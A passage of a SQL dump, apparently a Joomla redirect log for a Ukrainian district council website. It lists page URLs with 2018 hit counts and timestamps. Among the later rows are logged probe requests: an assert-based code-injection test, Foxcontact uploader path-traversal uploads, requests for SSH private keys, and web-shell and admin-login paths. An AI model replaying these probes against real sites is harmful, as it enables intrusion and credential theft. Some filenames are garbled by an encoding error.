00:00:00',301),(32105,'http://malyn-rayrada.gov.ua/gromadyanam/cnap/perelk-admnstrativnih-poslug/',NULL,'','',1,0,'2018-06-21 17:29:43','0000-00-00 00:00:00',301),(32106,'http://malyn-rayrada.gov.ua/gromadyanam/gurtki/',NULL,'','',1,0,'2018-06-21 17:29:45','0000-00-00 00:00:00',301),(32107,'http://malyn-rayrada.gov.ua/gromadyanam/korisne/',NULL,'','',1,0,'2018-06-21 17:29:47','0000-00-00 00:00:00',301),(32108,'http://malyn-rayrada.gov.ua/gromadyanam/msk-konkursi/',NULL,'','',1,0,'2018-06-21 17:29:53','0000-00-00 00:00:00',301),(32109,'http://malyn-rayrada.gov.ua/gromadyanam/msk-tarifi/',NULL,'','',1,0,'2018-06-21 17:29:56','0000-00-00 00:00:00',301),(32110,'http://malyn-rayrada.gov.ua/gromadyanam/msk-tarifi/dp-monolt-servs/',NULL,'','',1,0,'2018-06-21 17:30:01','0000-00-00 00:00:00',301),(32111,'http://malyn-rayrada.gov.ua/gromadyanam/osbb/',NULL,'','',1,0,'2018-06-21 17:30:06','0000-00-00 00:00:00',301),(32112,'http://malyn-rayrada.gov.ua/gromadyanam/pereymenuvannya-vulic/',NULL,'','',1,0,'2018-06-21 17:30:10','0000-00-00 00:00:00',301),(32113,'http://malyn-rayrada.gov.ua/gromadyanam/programms/',NULL,'','',1,0,'2018-06-21 17:30:14','0000-00-00 00:00:00',301),(32114,'http://malyn-rayrada.gov.ua/gromadyanam/programms/mska-programa--socalnogo-zahistu-veteranv-pedagogc/',NULL,'','',1,0,'2018-06-21 17:30:17','0000-00-00 00:00:00',301),(32115,'http://malyn-rayrada.gov.ua/gromadyanam/programms/mska-programa-nadannya-fnansovo-pdtrimki-komunalni/',NULL,'','',1,0,'2018-06-21 17:30:21','0000-00-00 00:00:00',301),(32116,'http://malyn-rayrada.gov.ua/gromadyanam/programms/mska-programa-nventarizac--obktv--neruhomost--zele/',NULL,'','',1,0,'2018-06-21 17:30:24','0000-00-00 00:00:00',301),(32117,'http://malyn-rayrada.gov.ua/gromadyanam/programms/programa-osnovn--napryamki---blagoustroyu-v--mezha/',NULL,'','',1,0,'2018-06-21 17:30:27','0000-00-00 00:00:00',301),(32118,'http://malyn-rayrada.gov.ua/gromadyanam/programms/programa-socalno-ekonomchnogo-ta-kulturnogo-rozvit/',NULL,'','',1,0,'2018-06-21 17:30:33','0000-00-00 00:00:00',301),(32119,'http://malyn-rayrada.gov.ua/gromadyanam/programms/programa-zabezpechennya--molod-zhitlom-na-2013-201/',NULL,'','',1,0,'2018-06-21 17:30:36','0000-00-00 00:00:00',301),(32120,'http://malyn-rayrada.gov.ua/gromadyanam/programms/programa-zaynyatost-naselennya-m-chornomorsk-na-20/',NULL,'','',1,0,'2018-06-21 17:30:42','0000-00-00 00:00:00',301),(32121,'http://malyn-rayrada.gov.ua/gromadyanam/taxes/',NULL,'','',1,0,'2018-06-21 17:30:46','0000-00-00 00:00:00',301),(32122,'http://malyn-rayrada.gov.ua/gromadyanam/taxes/rishennya/',NULL,'','',1,0,'2018-06-21 17:30:48','0000-00-00 00:00:00',301),(32123,'http://malyn-rayrada.gov.ua/misto/',NULL,'','',1,0,'2018-06-21 17:30:51','0000-00-00 00:00:00',301),(32124,'http://malyn-rayrada.gov.ua/misto/ip-camera/',NULL,'','',1,0,'2018-06-21 17:30:55','0000-00-00 00:00:00',301),(32125,'http://malyn-rayrada.gov.ua/misto/kultura/',NULL,'','',1,0,'2018-06-21 17:30:58','0000-00-00 00:00:00',301),(32126,'http://malyn-rayrada.gov.ua/misto/medicina/',NULL,'','',1,0,'2018-06-21 17:31:02','0000-00-00 00:00:00',301),(32127,'http://malyn-rayrada.gov.ua/misto/medicina/dityacha-polklnka/',NULL,'','',1,0,'2018-06-21 17:31:07','0000-00-00 00:00:00',301),(32128,'http://malyn-rayrada.gov.ua/misto/medicina/medicina/',NULL,'','',1,0,'2018-06-21 17:31:10','0000-00-00 00:00:00',301),(32129,'http://malyn-rayrada.gov.ua/misto/medicina/staconar/',NULL,'','',1,0,'2018-06-21 17:31:15','0000-00-00 00:00:00',301),(32130,'http://malyn-rayrada.gov.ua/misto/medicina/zhnocha-konsultacya/',NULL,'','',1,0,'2018-06-21 17:31:18','0000-00-00 00:00:00',301),(32131,'http://malyn-rayrada.gov.ua/misto/osvita/',NULL,'','',1,0,'2018-06-21 17:31:22','0000-00-00 00:00:00',301),(32132,'http://malyn-rayrada.gov.ua/misto/osvita/dovdnik/',NULL,'','',1,0,'2018-06-21 17:31:26','0000-00-00 00:00:00',301),(32133,'http://malyn-rayrada.gov.ua/misto/osvita/publchna-nformacya/',NULL,'','',1,0,'2018-06-21 17:31:30','0000-00-00 00:00:00',301),(32134,'http://malyn-rayrada.gov.ua/misto/osvita/vakans/',NULL,'','',1,0,'2018-06-21 17:31:33','0000-00-00 00:00:00',301),(32135,'http://malyn-rayrada.gov.ua/misto/osvita/vo/',NULL,'','',1,0,'2018-06-21 17:31:36','0000-00-00 00:00:00',301),(32136,'http://malyn-rayrada.gov.ua/misto/osvita/znz/',NULL,'','',1,0,'2018-06-21 17:31:39','0000-00-00 00:00:00',301),(32137,'http://malyn-rayrada.gov.ua/misto/photo/',NULL,'','',1,0,'2018-06-21 17:31:42','0000-00-00 00:00:00',301),(32138,'http://malyn-rayrada.gov.ua/misto/pro-msto/',NULL,'','',1,0,'2018-06-21 17:31:46','0000-00-00 00:00:00',301),(32139,'http://malyn-rayrada.gov.ua/misto/pro-msto/gromadyani/',NULL,'','',1,0,'2018-06-21 17:31:49','0000-00-00 00:00:00',301),(32140,'http://malyn-rayrada.gov.ua/misto/pro-msto/nagorodi-ta-viznannya/',NULL,'','',1,0,'2018-06-21 17:31:52','0000-00-00 00:00:00',301),(32141,'http://malyn-rayrada.gov.ua/misto/pro-msto/pidprimstva/',NULL,'','',1,0,'2018-06-21 17:31:55','0000-00-00 00:00:00',301),(32142,'http://malyn-rayrada.gov.ua/misto/pro-msto/pobratimi/',NULL,'','',1,0,'2018-06-21 17:31:59','0000-00-00 00:00:00',301),(32143,'http://malyn-rayrada.gov.ua/misto/socalna-poltika/',NULL,'','',1,0,'2018-06-21 17:32:03','0000-00-00 00:00:00',301),(32144,'http://malyn-rayrada.gov.ua/misto/socalna-poltika/socalna-dopomoga/',NULL,'','',1,0,'2018-06-21 17:32:07','0000-00-00 00:00:00',301),(32145,'http://malyn-rayrada.gov.ua/misto/sport/',NULL,'','',1,0,'2018-06-21 17:32:09','0000-00-00 00:00:00',301),(32146,'http://malyn-rayrada.gov.ua/misto/transport/',NULL,'','',1,0,'2018-06-21 17:32:13','0000-00-00 00:00:00',301),(32147,'http://malyn-rayrada.gov.ua/misto/video/',NULL,'','',1,0,'2018-06-21 17:32:16','0000-00-00 00:00:00',301),(32148,'http://malyn-rayrada.gov.ua/news/',NULL,'','',2,0,'2018-06-21 17:32:19','0000-00-00 00:00:00',301),(32149,'http://malyn-rayrada.gov.ua/prozora/',NULL,'','',1,0,'2018-06-21 17:32:21','0000-00-00 00:00:00',301),(32150,'http://malyn-rayrada.gov.ua/prozora/11581/vidbulos-zasidannya-komisiji-z-realizaciji-byudzhetu-uchasti-u-misti-chornomorsku/',NULL,'','',1,0,'2018-06-21 17:32:25','0000-00-00 00:00:00',301),(32151,'http://malyn-rayrada.gov.ua/prozora/byudzhet-msta/',NULL,'','',1,0,'2018-06-21 17:32:30','0000-00-00 00:00:00',301),(32152,'http://malyn-rayrada.gov.ua/prozora/byudzhet-msta/pasporti-byudzhetnih-program-ta-zvti-pro-h-vikonan/',NULL,'','',1,0,'2018-06-21 17:32:32','0000-00-00 00:00:00',301),(32153,'http://malyn-rayrada.gov.ua/prozora/byudzhet-msta/publchn-fnansi/',NULL,'','',1,0,'2018-06-21 17:32:36','0000-00-00 00:00:00',301),(32154,'http://malyn-rayrada.gov.ua/prozora/byudzhet-msta/zvtnst/',NULL,'','',1,0,'2018-06-21 17:32:40','0000-00-00 00:00:00',301),(32155,'http://malyn-rayrada.gov.ua/prozora/documents/',NULL,'','',1,0,'2018-06-21 17:32:42','0000-00-00 00:00:00',301),(32156,'http://malyn-rayrada.gov.ua/prozora/komunalne/',NULL,'','',1,0,'2018-06-21 17:32:46','0000-00-00 00:00:00',301),(32157,'http://malyn-rayrada.gov.ua/prozora/komunalne/konkursi/',NULL,'','',1,0,'2018-06-21 17:32:50','0000-00-00 00:00:00',301),(32158,'http://malyn-rayrada.gov.ua/prozora/komunalne/orenda-zeml--komunalno-vlasnost/',NULL,'','',1,0,'2018-06-21 17:32:53','0000-00-00 00:00:00',301),(32159,'http://malyn-rayrada.gov.ua/prozora/komunalne/perelk-komunalnogo-mayna-shcho-bulo-peredano-v-ore/',NULL,'','',1,0,'2018-06-21 17:32:55','0000-00-00 00:00:00',301),(32160,'http://malyn-rayrada.gov.ua/prozora/komunalne/perelk-obktv-komunalno-vlasnost/',NULL,'','',1,0,'2018-06-21 17:32:58','0000-00-00 00:00:00',301),(32161,'http://malyn-rayrada.gov.ua/prozora/komunalne/perelk-vlnih-nezhitlovih-primshchen-/',NULL,'','',1,0,'2018-06-21 17:33:00','0000-00-00 00:00:00',301),(32162,'http://malyn-rayrada.gov.ua/prozora/ochishchennya/',NULL,'','',1,0,'2018-06-21 17:33:03','0000-00-00 00:00:00',301),(32163,'http://malyn-rayrada.gov.ua/prozora/ochishchennya/e-deklaruvannya-/',NULL,'','',1,0,'2018-06-21 17:33:06','0000-00-00 00:00:00',301),(32164,'http://malyn-rayrada.gov.ua/prozora/plan/',NULL,'','',1,0,'2018-06-21 17:33:09','0000-00-00 00:00:00',301),(32165,'http://malyn-rayrada.gov.ua/prozora/plan/beregoukrplennya/',NULL,'','',1,0,'2018-06-21 17:33:13','0000-00-00 00:00:00',301),(32166,'http://malyn-rayrada.gov.ua/prozora/plan/nzhenern-merezh/',NULL,'','',1,0,'2018-06-21 17:33:17','0000-00-00 00:00:00',301),(32167,'http://malyn-rayrada.gov.ua/prozora/plan/shema-magstraley-mskogo-transportu/',NULL,'','',1,0,'2018-06-21 17:33:19','0000-00-00 00:00:00',301),(32168,'http://malyn-rayrada.gov.ua/prozora/plan/shemi-dysnih-ta-proektnih-planuvalnih-obmezhen/',NULL,'','',1,0,'2018-06-21 17:33:23','0000-00-00 00:00:00',301),(32169,'http://malyn-rayrada.gov.ua/prozora/plan/zoning/',NULL,'','',1,0,'2018-06-21 17:33:27','0000-00-00 00:00:00',301),(32170,'http://malyn-rayrada.gov.ua/prozora/public/',NULL,'','',1,0,'2018-06-21 17:33:31','0000-00-00 00:00:00',301),(32171,'http://malyn-rayrada.gov.ua/prozora/public/documents/',NULL,'','',1,0,'2018-06-21 17:33:36','0000-00-00 00:00:00',301),(32172,'http://malyn-rayrada.gov.ua/prozora/public/oblik/',NULL,'','',1,0,'2018-06-21 17:33:40','0000-00-00 00:00:00',301),(32173,'http://malyn-rayrada.gov.ua/prozora/public/poryadok-dostupu-do-publchno-nformac/',NULL,'','',1,0,'2018-06-21 17:33:43','0000-00-00 00:00:00',301),(32174,'http://malyn-rayrada.gov.ua/prozora/public/sluzhbova/',NULL,'','',1,0,'2018-06-21 17:33:46','0000-00-00 00:00:00',301),(32175,'http://malyn-rayrada.gov.ua/prozora/public/zviti/',NULL,'','',1,0,'2018-06-21 17:33:49','0000-00-00 00:00:00',301),(32176,'http://malyn-rayrada.gov.ua/prozora/regulyatorna/',NULL,'','',1,0,'2018-06-21 17:33:52','0000-00-00 00:00:00',301),(32177,'http://malyn-rayrada.gov.ua/prozora/regulyatorna/perelk-regulyatornih-aktv/',NULL,'','',1,0,'2018-06-21 17:33:55','0000-00-00 00:00:00',301),(32178,'http://malyn-rayrada.gov.ua/prozora/regulyatorna/plani-priynyattya-regulyatornih-aktv/',NULL,'','',1,0,'2018-06-21 17:33:59','0000-00-00 00:00:00',301),(32179,'http://malyn-rayrada.gov.ua/prozora/regulyatorna/zviti/',NULL,'','',1,0,'2018-06-21 17:34:03','0000-00-00 00:00:00',301),(32180,'http://malyn-rayrada.gov.ua/prozora/reklama/',NULL,'','',1,0,'2018-06-21 17:34:06','0000-00-00 00:00:00',301),(32181,'http://malyn-rayrada.gov.ua/prozora/sporudi/',NULL,'','',1,0,'2018-06-21 17:34:09','0000-00-00 00:00:00',301),(32182,'http://malyn-rayrada.gov.ua/prozora/zakupivli/',NULL,'','',1,0,'2018-06-21 17:34:13','0000-00-00 00:00:00',301),(32183,'http://malyn-rayrada.gov.ua/prozora/zakupivli/akcepti/',NULL,'','',1,0,'2018-06-21 17:34:15','0000-00-00 00:00:00',301),(32184,'http://malyn-rayrada.gov.ua/prozora/zakupivli/dogovori/',NULL,'','',1,0,'2018-06-21 17:34:18','0000-00-00 00:00:00',301),(32185,'http://malyn-rayrada.gov.ua/prozora/zakupivli/komiteti/',NULL,'','',1,0,'2018-06-21 17:34:21','0000-00-00 00:00:00',301),(32186,'http://malyn-rayrada.gov.ua/vlada/komunalni/ohorona/',NULL,'','',1,0,'2018-06-21 17:34:24','0000-00-00 00:00:00',301),(32187,'http://malyn-rayrada.gov.ua/vlada/komunalni/teploenergo/',NULL,'','',1,0,'2018-06-21 17:34:28','0000-00-00 00:00:00',301),(32188,'http://malyn-rayrada.gov.ua/vlada/komunalni/tov-lkomsvt/',NULL,'','',1,0,'2018-06-21 17:34:32','0000-00-00 00:00:00',301),(32189,'http://malyn-rayrada.gov.ua/vlada/komunalni/vodokanal/',NULL,'','',1,0,'2018-06-21 17:34:35','0000-00-00 00:00:00',301),(32190,'http://malyn-rayrada.gov.ua/vlada/komunalni/vodokanal/novini/11611/do-uvagi-spozhivachiv-kp-chornomorskvodokanal/',NULL,'','',1,0,'2018-06-21 17:34:38','0000-00-00 00:00:00',301),(32191,'http://malyn-rayrada.gov.ua/vlada/komunalni/zkh/',NULL,'','',1,0,'2018-06-21 17:34:43','0000-00-00 00:00:00',301),(32192,'http://malyn-rayrada.gov.ua/vlada/komunalni/zkh/borzhniki/11578/perelik-borzhnikiv-za-poslugi-z-utrimannya-budinkiv-ta-pribudinkovih-teritoriy-stanom-na-01-chervnya-2018-roku/',NULL,'','',1,0,'2018-06-21 17:34:47','0000-00-00 00:00:00',301),(32193,'http://malyn-rayrada.gov.ua/vlada/komunalni/zkh/vakans/11579/vakantni-posadi-v-kp-muzhkg-cherven-2018-roku/',NULL,'','',1,0,'2018-06-21 17:34:49','0000-00-00 00:00:00',301),(32194,'http://malyn-rayrada.gov.ua/vlada/miska-rada/',NULL,'','',1,0,'2018-06-21 17:34:51','0000-00-00 00:00:00',301),(32195,'http://malyn-rayrada.gov.ua/vlada/miska-rada/deputatsk-frakc-ta-grupi/',NULL,'','',1,0,'2018-06-21 17:34:54','0000-00-00 00:00:00',301),(32196,'http://malyn-rayrada.gov.ua/vlada/miska-rada/karta/',NULL,'','',1,0,'2018-06-21 17:34:59','0000-00-00 00:00:00',301),(32197,'http://malyn-rayrada.gov.ua/vlada/miska-rada/korpus/',NULL,'','',1,0,'2018-06-21 17:35:02','0000-00-00 00:00:00',301),(32198,'http://malyn-rayrada.gov.ua/vlada/miska-rada/postyn-koms-msko-radi/',NULL,'','',1,0,'2018-06-21 17:35:06','0000-00-00 00:00:00',301),(32199,'http://malyn-rayrada.gov.ua/vlada/miska-rada/reglament/',NULL,'','',1,0,'2018-06-21 17:35:10','0000-00-00 00:00:00',301),(32200,'http://malyn-rayrada.gov.ua/vlada/miska-rada/sekretar-msko-radi/',NULL,'','',1,0,'2018-06-21 17:35:12','0000-00-00 00:00:00',301),(32201,'http://malyn-rayrada.gov.ua/vlada/miska-rada/ses/',NULL,'','',1,0,'2018-06-21 17:35:17','0000-00-00 00:00:00',301),(32202,'http://malyn-rayrada.gov.ua/vlada/priymalnya/',NULL,'','',1,0,'2018-06-21 17:35:20','0000-00-00 00:00:00',301),(32203,'http://malyn-rayrada.gov.ua/vlada/priymalnya/dovidnik/',NULL,'','',1,0,'2018-06-21 17:35:24','0000-00-00 00:00:00',301),(32204,'http://malyn-rayrada.gov.ua/vlada/priymalnya/elektronn-zvernennya2/',NULL,'','',1,0,'2018-06-21 17:35:27','0000-00-00 00:00:00',301),(32205,'http://malyn-rayrada.gov.ua/vlada/priymalnya/grafik/',NULL,'','',1,0,'2018-06-21 17:35:29','0000-00-00 00:00:00',301),(32206,'http://malyn-rayrada.gov.ua/vlada/priymalnya/peticii/',NULL,'','',1,0,'2018-06-21 17:35:33','0000-00-00 00:00:00',301),(32207,'http://malyn-rayrada.gov.ua/vlada/ustanovi/',NULL,'','',1,0,'2018-06-21 17:35:36','0000-00-00 00:00:00',301),(32208,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhavna-fnansova-nspekcya/',NULL,'','',1,0,'2018-06-21 17:35:39','0000-00-00 00:00:00',301),(32209,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhavna-podatkova-nspekcya/',NULL,'','',1,0,'2018-06-21 17:35:40','0000-00-00 00:00:00',301),(32210,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhavna-podatkova-nspekcya/11604/do-uvagi-predstavnikiv-biznesu-ta-institutiv-gromadyanskogo-suspilstva/',NULL,'','',1,0,'2018-06-21 17:35:43','0000-00-00 00:00:00',301),(32211,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhavna-podatkova-nspekcya/11605/uvaga-reyestr-rro-onovleno/',NULL,'','',1,0,'2018-06-21 17:35:45','0000-00-00 00:00:00',301),(32212,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhavna-podatkova-nspekcya/11606/vedennya-obliku-dohodiv-u-pidpriyemciv-yedinnikiv/',NULL,'','',1,0,'2018-06-21 17:35:47','0000-00-00 00:00:00',301),(32213,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhavna-podatkova-nspekcya/11607/zastosuvannya-podatkovoji-socialnoji-pilgi-u-2018-roci/',NULL,'','',1,0,'2018-06-21 17:35:51','0000-00-00 00:00:00',301),(32214,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhavna-podatkova-nspekcya/11608/dokumenti-yaki-povinni-znahoditis-na-torgivelnomu-misci-u-pidpriyemcya/',NULL,'','',1,0,'2018-06-21 17:35:53','0000-00-00 00:00:00',301),(32215,'http://malyn-rayrada.gov.ua/vlada/ustanovi/derzhzemagenstvo/',NULL,'','',1,0,'2018-06-21 17:35:55','0000-00-00 00:00:00',301),(32216,'http://malyn-rayrada.gov.ua/vlada/ustanovi/mskiy-centr-zaynyatost/',NULL,'','',1,0,'2018-06-21 17:35:59','0000-00-00 00:00:00',301),(32217,'http://malyn-rayrada.gov.ua/vlada/ustanovi/upravlnnya-pensynogo-fondu/',NULL,'','',1,0,'2018-06-21 17:36:01','0000-00-00 00:00:00',301),(32218,'http://malyn-rayrada.gov.ua/vlada/vakans/',NULL,'','',1,0,'2018-06-21 17:36:03','0000-00-00 00:00:00',301),(32219,'http://malyn-rayrada.gov.ua/vlada/vakans/komunalni/',NULL,'','',1,0,'2018-06-21 17:36:06','0000-00-00 00:00:00',301),(32220,'http://malyn-rayrada.gov.ua/vlada/vakans/vikonavchi/',NULL,'','',1,0,'2018-06-21 17:36:09','0000-00-00 00:00:00',301),(32221,'http://malyn-rayrada.gov.ua/vlada/vk/',NULL,'','',1,0,'2018-06-21 17:36:11','0000-00-00 00:00:00',301),(32222,'http://malyn-rayrada.gov.ua/vlada/vk/chleni-vikonavchogo-komtetu/',NULL,'','',1,0,'2018-06-21 17:36:14','0000-00-00 00:00:00',301),(32223,'http://malyn-rayrada.gov.ua/vlada/vk/gromadska-rada/',NULL,'','',1,0,'2018-06-21 17:36:16','0000-00-00 00:00:00',301),(32224,'http://malyn-rayrada.gov.ua/vlada/vk/struktura/',NULL,'','',1,0,'2018-06-21 17:36:19','0000-00-00 00:00:00',301),(32225,'http://malyn-rayrada.gov.ua/vlada/vk/zasdannya/',NULL,'','',1,0,'2018-06-21 17:36:21','0000-00-00 00:00:00',301),(32226,'http://malyn-rayrada.gov.ua/vlada/vk/zasdannya/11592/poryadok-denniy-zasidannya-vikonavchogo-komitetu-chornomorskoji-miskoji-radi/',NULL,'','',1,0,'2018-06-21 17:36:24','0000-00-00 00:00:00',301),(32227,'http://malyn-rayrada.gov.ua/vlada/vk/zasdannya/11609/poryadok-denniy-zasidannya-vikonavchogo-komitetu-chornomorskoji-miskoji-radi-odeskoji-oblasti/',NULL,'','',1,0,'2018-06-21 17:36:25','0000-00-00 00:00:00',301),(32228,'http://malyn-rayrada.gov.ua/vlada/vk/zastupniki/',NULL,'','',1,0,'2018-06-21 17:36:29','0000-00-00 00:00:00',301),(32229,'http://www.malyn-rayrada.gov.ua/index.php/1993-ogoloshennya-pro-seminar',NULL,'','',7,0,'2018-06-22 18:07:55','0000-00-00 00:00:00',301),(32230,'http://www.malyn-rayrada.gov.ua/modules/modules/joomla-resize.php',NULL,'','',1,0,'2018-06-22 22:16:08','0000-00-00 00:00:00',301),(32231,'http://www.malyn-rayrada.gov.ua/modules/mod_bookmark/helper.php',NULL,'','',1,0,'2018-06-23 05:07:15','0000-00-00 00:00:00',301),(32232,'http://www.malyn-rayrada.gov.ua/modules/modules/version.php',NULL,'','',1,0,'2018-06-24 08:36:49','0000-00-00 00:00:00',301),(32233,'http://www.malyn-rayrada.gov.ua/modules/modules/path.php',NULL,'','',1,0,'2018-06-26 05:52:53','0000-00-00 00:00:00',301),(32234,'http://www.malyn-rayrada.gov.ua/components/modules.php',NULL,'','',1,0,'2018-06-27 20:56:58','0000-00-00 00:00:00',301),(32235,'http://www.malyn-rayrada.gov.ua/components/com_search/models/system.php',NULL,'','',1,0,'2018-06-27 22:34:24','0000-00-00 00:00:00',301),(32236,'http://www.malyn-rayrada.gov.ua/index.php/2024-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-24-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',12,0,'2018-06-29 08:50:25','0000-00-00 00:00:00',301),(32237,'http://www.malyn-rayrada.gov.ua/libraries/phputf8/xost-locale.php',NULL,'','',1,0,'2018-07-03 23:08:12','0000-00-00 00:00:00',301),(32238,'http://malyn-rayrada.gov.ua/attachments/article/2037/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð² 24 ñ ðµñ ñ–ñ  15062018.pdf',NULL,'','',1,0,'2018-07-04 13:22:46','0000-00-00 00:00:00',301),(32239,'http://malyn-rayrada.gov.ua/user/login',NULL,'','',1,0,'2018-07-05 21:11:46','0000-00-00 00:00:00',301),(32240,'http://malyn-rayrada.gov.ua/wp-admin/setup-config.php',NULL,'','',1,0,'2018-07-05 21:11:48','0000-00-00 00:00:00',301),(32241,'http://malyn-rayrada.gov.ua/wp-admin/install.php',NULL,'','',1,0,'2018-07-05 21:11:48','0000-00-00 00:00:00',301),(32242,'http://malyn-rayrada.gov.ua/installation/index.php',NULL,'','',1,0,'2018-07-05 21:11:49','0000-00-00 00:00:00',301),(32243,'http://malyn-rayrada.gov.ua/wp-icoud.php',NULL,'','',1,0,'2018-07-06 04:28:10','0000-00-00 00:00:00',301),(32244,'http://malyn-rayrada.gov.ua/sys.php.php',NULL,'','',1,0,'2018-07-06 16:06:24','0000-00-00 00:00:00',301),(32245,'http://malyn-rayrada.gov.ua/code.php.php',NULL,'','',1,0,'2018-07-06 22:07:18','0000-00-00 00:00:00',301),(32246,'http://malyn-rayrada.gov.ua/forum.php',NULL,'','',1,0,'2018-07-07 04:07:37','0000-00-00 00:00:00',301),(32247,'http://malyn-rayrada.gov.ua/media/media.php?1=assert&2=die(pi()*42);',NULL,'','',2,0,'2018-07-07 14:34:16','0000-00-00 00:00:00',301),(32248,'http://malyn-rayrada.gov.ua/plugins/modules.php',NULL,'','',1,0,'2018-07-07 14:56:49','0000-00-00 00:00:00',301),(32249,'http://malyn-rayrada.gov.ua/options.php',NULL,'','',2,0,'2018-07-07 16:30:25','0000-00-00 00:00:00',301),(32250,'http://malyn-rayrada.gov.ua/index.php/htt',NULL,'','',1,0,'2018-07-08 00:00:56','0000-00-00 00:00:00',301),(32251,'http://malyn-rayrada.gov.ua/tmp.php',NULL,'','',1,0,'2018-07-08 04:13:00','0000-00-00 00:00:00',301),(32252,'http://malyn-rayrada.gov.ua/mobile_detect.php',NULL,'','',1,0,'2018-07-08 10:13:58','0000-00-00 00:00:00',301),(32253,'http://www.malyn-rayrada.gov.ua/content-post.php',NULL,'','',3,0,'2018-07-10 18:39:50','0000-00-00 00:00:00',301),(32254,'http://malyn-rayrada.gov.ua/index.php?option=com_foxcontact',NULL,'','',1,0,'2018-07-12 22:42:04','0000-00-00 00:00:00',301),(32255,'http://malyn-rayrada.gov.ua/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-12 22:42:05','0000-00-00 00:00:00',301),(32256,'http://malyn-rayrada.gov.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=1&cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-12 22:42:07','0000-00-00 00:00:00',301),(32257,'http://malyn-rayrada.gov.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=1&cid=1&mid=1&owner=module&id=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-12 22:42:08','0000-00-00 00:00:00',301),(32258,'http://malyn-rayrada.gov.ua/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-12 22:42:09','0000-00-00 00:00:00',301),(32259,'http://malyn-rayrada.gov.ua/attachments/article/2040/ð›ñƒðºñ–ð²ñ ñœðºñ–ð¹ ñ ñ–ð»ñœñ ñœðºñ–ð¹ ñ€ð°ð´ñ– 95compressed.pdf',NULL,'','',1,0,'2018-07-13 06:29:29','0000-00-00 00:00:00',301),(32260,'http://malyn-rayrada.gov.ua//wp-login.php',NULL,'','',22,0,'2018-07-16 06:01:11','0000-00-00 00:00:00',301),(32261,'http://malyn-rayrada.gov.ua/blog//wp-login.php',NULL,'','',22,0,'2018-07-16 06:01:14','0000-00-00 00:00:00',301),(32262,'http://malyn-rayrada.gov.ua/wordpress//wp-login.php',NULL,'','',22,0,'2018-07-16 06:01:15','0000-00-00 00:00:00',301),(32263,'http://malyn-rayrada.gov.ua/wp//wp-login.php',NULL,'','',22,0,'2018-07-16 06:01:15','0000-00-00 00:00:00',301),(32264,'http://www.malyn-rayrada.gov.ua/connectors/system/phpthumb.php',NULL,'','',3,0,'2018-07-19 22:35:10','0000-00-00 00:00:00',301),(32265,'http://www.malyn-rayrada.gov.ua/dbs.php',NULL,'','',3,0,'2018-07-19 22:35:11','0000-00-00 00:00:00',301),(32266,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/log.php',NULL,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/log.php','',1,0,'2018-07-20 18:30:34','0000-00-00 00:00:00',301),(32267,'http://malyn-rayrada.gov.ua/connectors/system/phpthumb.php',NULL,'','',2,0,'2018-07-21 02:06:07','0000-00-00 00:00:00',301),(32268,'http://malyn-rayrada.gov.ua/dbs.php',NULL,'','',2,0,'2018-07-21 02:06:08','0000-00-00 00:00:00',301),(32269,'http://www.malyn-rayrada.gov.ua/components/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/components/logo_img.php','',1,0,'2018-07-22 15:52:07','0000-00-00 00:00:00',301),(32270,'http://www.malyn-rayrada.gov.ua/manager/index.php',NULL,'http://www.malyn-rayrada.gov.ua/manager/index.php','',2,0,'2018-07-25 13:27:24','0000-00-00 00:00:00',301),(32271,'http://malyn-rayrada.gov.ua/pma/index.php',NULL,'','',1,0,'2018-07-25 13:40:50','0000-00-00 00:00:00',301),(32272,'http://www.malyn-rayrada.gov.ua/attachments/article/1914/ð ð‘ðš.pdf',NULL,'','',9,0,'2018-07-25 14:37:07','0000-00-00 00:00:00',301),(32273,'http://www.malyn-rayrada.gov.ua/attachments/article/1914/ð¦ð ð‘.pdf',NULL,'','',9,0,'2018-07-25 14:37:09','0000-00-00 00:00:00',301),(32274,'http://malyn-rayrada.gov.ua//wp-admin/admin-ajax.php',NULL,'','',1,0,'2018-07-26 05:34:59','0000-00-00 00:00:00',301),(32275,'http://malyn-rayrada.gov.ua/rxr.php?rxr',NULL,'','',1,0,'2018-07-28 19:56:14','0000-00-00 00:00:00',301),(32276,'http://malyn-rayrada.gov.ua/attachments/article/2060/ð¿ð¸ñ‚ð°ð½ð½ñ  ð¢ð¾ð¼ð¾ñ ñƒ.pdf',NULL,'','',1,0,'2018-08-04 05:36:43','0000-00-00 00:00:00',301),(32277,'http://malyn-rayrada.gov.ua/index.php/2061-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'','',29,0,'2018-08-08 18:48:56','0000-00-00 00:00:00',301),(32278,'http://www.malyn-rayrada.gov.ua/index.php/2061-do-vidoma-deputativ-rajonnoji-radi-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-08-09 04:47:55','0000-00-00 00:00:00',301),(32279,'http://malyn-rayrada.gov.ua/id_rsa',NULL,'','',1,0,'2018-08-09 23:43:32','0000-00-00 00:00:00',301),(32280,'http://malyn-rayrada.gov.ua/id_dsa',NULL,'','',1,0,'2018-08-09 23:43:32','0000-00-00 00:00:00',301),(32281,'http://malyn-rayrada.gov.ua/.ssh/id_rsa',NULL,'','',1,0,'2018-08-09 23:43:32','0000-00-00 00:00:00',301),(32282,'http://malyn-rayrada.gov.ua/.ssh/id_dsa',NULL,'','',1,0,'2018-08-09 23:43:32','0000-00-00 